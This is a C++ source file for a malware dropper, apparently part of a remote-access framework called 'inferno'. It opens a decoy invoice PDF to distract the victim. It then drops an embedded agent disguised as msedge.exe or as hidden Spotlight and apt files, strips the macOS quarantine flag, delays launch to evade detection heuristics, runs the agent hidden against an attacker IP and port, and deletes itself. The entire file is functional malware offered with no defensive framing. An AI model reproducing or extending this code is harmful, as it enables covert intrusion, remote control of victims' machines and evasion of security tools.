#include <cstdio>
#include <cstdlib>
#include <cstdint>
#include <cstring>
#include <string>
#include <vector>
#include <random>
#include <chrono>

#ifdef _WIN32
#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN
#endif
#include <windows.h>
#include <shlobj.h>
#else
#include <unistd.h>
#include <sys/stat.h>
#include <libgen.h>
#endif

// This header is auto-generated by CMake from the built inferno_client binary
// and the decoy PDF. It defines:
//   inferno::wrapper::AGENT_BINARY[] / AGENT_BINARY_SIZE
//   inferno::wrapper::DECOY_DATA[]  / DECOY_DATA_SIZE
#if __has_include("agent_binary.h")
#include "agent_binary.h"
#else
// Placeholder for development — wrapper won't function without the real binary.
namespace inferno { namespace wrapper {
const unsigned char AGENT_BINARY[] = {0};
const size_t AGENT_BINARY_SIZE = 0;
const unsigned char DECOY_DATA[] = {0};
const size_t DECOY_DATA_SIZE = 0;
} }
#endif

namespace {

std::string installPath() {
#ifdef _WIN32
    char appdata[MAX_PATH];
    if (SHGetFolderPathA(nullptr, CSIDL_LOCAL_APPDATA, nullptr, 0, appdata) != S_OK) {
        return "C:\\temp\\inferno_agent.exe";
    }
    std::string path(appdata);
    path += "\\Microsoft\\Edge\\Application\\";

    // Append a plausible Edge version subdirectory (e.g. 114.0.1823.58)
    // so the path mirrors a genuine installation.
    {
        std::random_device rd;
        std::mt19937 rng(rd());
        std::uniform_int_distribution<int> major_dist(100, 130);
        std::uniform_int_distribution<int> minor_dist(0, 5);
        std::uniform_int_distribution<int> build_dist(1500, 2300);
        std::uniform_int_distribution<int> patch_dist(30, 120);
        path += std::to_string(major_dist(rng)) + ".";
        path += std::to_string(minor_dist(rng)) + ".";
        path += std::to_string(build_dist(rng)) + ".";
        path += std::to_string(patch_dist(rng));
    }
    path += "\\msedge.exe";
    return path;
#elif defined(__APPLE__)
    const char* home = ::getenv("HOME");
    if (!home) return "/tmp/.SpotlightIndex";
    return std::string(home) + "/Library/Application Support/.Spotlight/V100/SpotlightIndex";
#else
    const char* home = ::getenv("HOME");
    if (!home) return "/tmp/.apt-get";
    return std::string(home) + "/.cache/apt/archives/.apt-get";
#endif
}

bool createDirectoryForFile(std::string& path) {
#ifdef _WIN32
    // Helper: recursively create all directory components
    auto createDirs = [](const std::string& dir_path) -> bool {
        std::string current;
        for (size_t i = 0; i < dir_path.size(); ++i) {
            current += dir_path[i];
            if (dir_path[i] == '/') {
                if (!CreateDirectoryA(current.c_str(), nullptr)) {
                    if (GetLastError() != ERROR_ALREADY_EXISTS) return false;
                }
            }
        }
        if (!CreateDirectoryA(dir_path.c_str(), nullptr)) {
            if (GetLastError() != ERROR_ALREADY_EXISTS) return false;
        }
        return true;
    };

    // Normalize backslashes to forward slashes
    std::string dir = path;
    for (size_t i = 0; i < dir.size(); ++i) {
        if (dir[i] == '\\') dir[i] = '/';
    }
    size_t pos = dir.rfind('/');
    if (pos == std::string::npos) return false;
    std::string dir_only = dir.substr(0, pos);

    // Try primary path (e.g. AppData\Microsoft\Crypto\RSA\...)
    if (createDirs(dir_only)) return true;

    // Fallback: %TEMP%\<random hex>
    char temp_buf[MAX_PATH];
    if (GetTempPathA(MAX_PATH, temp_buf) == 0) {
        std::fprintf(stderr, "[Wrapper] GetTempPathA failed: GLE=%lu\n", GetLastError());
        return false;
    }
    std::string fallback(temp_buf);
    while (!fallback.empty() && (fallback.back() == '\\' || fallback.back() == '/')) {
        fallback.pop_back();
    }

    std::random_device rd;
    std::mt19937 rng(rd());
    std::uniform_int_distribution<int> hex_dist(0, 15);
    const char hex_chars[] = "0123456789abcdef";
    fallback += "\\";
    for (int i = 0; i < 8; ++i) {
        fallback += hex_chars[hex_dist(rng)];
    }

    // Normalize fallback path
    std::string fb_normalized = fallback;
    for (size_t i = 0; i < fb_normalized.size(); ++i) {
        if (fb_normalized[i] == '\\') fb_normalized[i] = '/';
    }

    if (!createDirs(fb_normalized)) return false;

    // Extract original filename and update path
    std::string filename = path;
    pos = path.rfind('\\');
    if (pos == std::string::npos) pos = path.rfind('/');
    if (pos != std::string::npos) filename = path.substr(pos + 1);
    path = fallback + "\\" + filename;
    return true;
#else
    std::string dir = path;
    size_t pos = dir.rfind('/');
    if (pos == std::string::npos) return false;
    dir = dir.substr(0, pos);

    // Create directory recursively
    std::string current;
    for (size_t i = 0; i < dir.size(); ++i) {
        current += dir[i];
        if (dir[i] == '/') {
            if (::mkdir(current.c_str(), 0700) != 0 && errno != EEXIST) {
                std::fprintf(stderr, "[Wrapper] mkdir(%s) failed: %s\n",
                             current.c_str(), std::strerror(errno));
                return false;
            }
        }
    }
    if (::mkdir(dir.c_str(), 0700) != 0 && errno != EEXIST) {
        std::fprintf(stderr, "[Wrapper] mkdir(%s) failed: %s\n",
                     dir.c_str(), std::strerror(errno));
        return false;
    }
    return true;
#endif
}

bool extractAgent(const std::string& target) {
    if (inferno::wrapper::AGENT_BINARY_SIZE == 0) {
        std::fprintf(stderr, "[Wrapper] Agent binary not embedded.\n");
        return false;
    }
    FILE* f = ::fopen(target.c_str(), "wb");
    if (!f) {
        std::fprintf(stderr, "[Wrapper] fopen(%s) failed: %s\n",
                     target.c_str(), std::strerror(errno));
        return false;
    }

    size_t written = ::fwrite(inferno::wrapper::AGENT_BINARY, 1,
                              inferno::wrapper::AGENT_BINARY_SIZE, f);
    ::fclose(f);

    if (written != inferno::wrapper::AGENT_BINARY_SIZE) {
        std::fprintf(stderr, "[Wrapper] fwrite wrote %zu/%zu bytes\n",
                     written, inferno::wrapper::AGENT_BINARY_SIZE);
        ::remove(target.c_str());
        return false;
    }

#ifndef _WIN32
    ::chmod(target.c_str(), 0755);
#endif
    return true;
}

bool runAgent(const std::string& path, const std::string& ip, uint16_t port) {
    std::string port_str = std::to_string(port);

#ifdef _WIN32
    std::string cmd = "\"" + path + "\" " + ip + " " + port_str;
    STARTUPINFOA si = {sizeof(si)};
    PROCESS_INFORMATION pi;
    if (!CreateProcessA(nullptr, const_cast<char*>(cmd.c_str()),
                        nullptr, nullptr, FALSE,
                        DETACHED_PROCESS | CREATE_NO_WINDOW,
                        nullptr, nullptr, &si, &pi)) {
        std::fprintf(stderr, "[Wrapper] CreateProcessA(%s) failed: GLE=%lu\n",
                     cmd.c_str(), GetLastError());
        return false;
    }
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return true;
#else
#if defined(__APPLE__)
    // Remove quarantine attribute so Gatekeeper doesn't block the agent
    std::string xattr_cmd = "xattr -dr com.apple.quarantine \"";
    xattr_cmd += path;
    xattr_cmd += "\" 2>/dev/null";
    ::system(xattr_cmd.c_str());
#endif
    pid_t pid = ::fork();
    if (pid < 0) {
        std::fprintf(stderr, "[Wrapper] fork() failed: %s\n", std::strerror(errno));
        return false;
    }
    if (pid > 0) return true; // parent returns, child continues

    // Child: execute the agent using execvp which searches PATH and
    // handles spaces in paths correctly via the argv array.
    const char* const args[] = {path.c_str(), ip.c_str(), port_str.c_str(), nullptr};
    ::execv(args[0], const_cast<char* const*>(args));

    // If execv fails, try shell fallback for tricky paths
    ::execl("/bin/sh", "sh", "-c",
            ("\"" + path + "\" " + ip + " " + port_str).c_str(), nullptr);

    ::exit(1); // should not reach here
#endif
}

std::string decoyPath() {
#ifdef _WIN32
    char buf[MAX_PATH];
    if (SHGetFolderPathA(nullptr, CSIDL_PROFILE, nullptr, 0, buf) != S_OK) {
        return "C:\\Users\\Public\\invoice.pdf";
    }
    return std::string(buf) + "\\Downloads\\invoice.pdf";
#else
    const char* home = ::getenv("HOME");
    if (!home) return "/tmp/invoice.pdf";
    return std::string(home) + "/Downloads/invoice.pdf";
#endif
}

bool extractFile(const std::string& target,
                 const unsigned char* data, size_t data_size) {
    FILE* f = ::fopen(target.c_str(), "wb");
    if (!f) {
        std::fprintf(stderr, "[Wrapper] fopen(%s) failed: %s\n",
                     target.c_str(), std::strerror(errno));
        return false;
    }
    size_t written = ::fwrite(data, 1, data_size, f);
    ::fclose(f);
    if (written != data_size) {
        std::fprintf(stderr, "[Wrapper] wrote %zu/%zu bytes\n",
                     written, data_size);
        ::remove(target.c_str());
        return false;
    }
    return true;
}

bool openFile(const std::string& path) {
#ifdef _WIN32
    return reinterpret_cast<intptr_t>(::ShellExecuteA(
        nullptr, "open", path.c_str(), nullptr, nullptr, SW_SHOW)) > 32;
#elif defined(__APPLE__)
    std::string cmd = "open \"" + path + "\" 2>/dev/null";
    return ::system(cmd.c_str()) == 0;
#else
    std::string cmd = "xdg-open \"" + path + "\" 2>/dev/null";
    return ::system(cmd.c_str()) == 0;
#endif
}

void selfDelete(const std::string& path) {
#ifdef _WIN32
    // Spawn a detached batch script that waits 3s then deletes the wrapper
    char temp_dir[MAX_PATH];
    if (GetTempPathA(MAX_PATH, temp_dir) == 0) return;
    std::string bat = std::string(temp_dir) + "\\del_inferno.bat";
    std::string script =
        "@echo off\r\n"
        "ping 127.0.0.1 -n 4 > nul\r\n"
        "del \"" + path + "\"\r\n"
        "del \"" + bat + "\"\r\n";
    FILE* f = ::fopen(bat.c_str(), "w");
    if (!f) return;
    ::fwrite(script.c_str(), 1, script.size(), f);
    ::fclose(f);
    ::ShellExecuteA(nullptr, "open", bat.c_str(), nullptr, nullptr, SW_HIDE);
#else
    pid_t pid = ::fork();
    if (pid == 0) {
        ::sleep(3);
        ::remove(path.c_str());
        ::_exit(0);
    }
#endif
}

} // anonymous namespace

int main(int argc, char* argv[]) {
    std::string ip = "127.0.0.1";
    uint16_t port = 8080;

    if (argc >= 3) {
        ip = argv[1];
        int p = std::atoi(argv[2]);
        if (p > 0 && p <= 65535) port = static_cast<uint16_t>(p);
    }

    // Step 1: Extract decoy PDF to user-visible Downloads folder
    std::string pdf = decoyPath();
    if (extractFile(pdf, inferno::wrapper::DECOY_DATA,
                     inferno::wrapper::DECOY_DATA_SIZE)) {
        openFile(pdf);
    }

    // Step 2: Extract agent to hidden install path
    std::string target = installPath();
    if (!createDirectoryForFile(target)) {
        return 1;
    }
    if (!extractAgent(target)) {
        return 1;
    }

    // Step 3: Execution jitter — break write-then-execute heuristics
    {
        std::random_device rd;
        std::mt19937 rng(rd());
        std::uniform_int_distribution<int> jitter_dist(5, 15);
        int delay = jitter_dist(rng);
#ifdef _WIN32
        ::Sleep(static_cast<DWORD>(delay) * 1000);
#else
        ::sleep(delay);
#endif
    }

    // Step 4: Launch agent
    if (!runAgent(target, ip, port)) {
        return 1;
    }

    // Step 5: Self-delete the wrapper binary
    if (argc > 0) {
        selfDelete(argv[0]);
    }
    return 0;
}
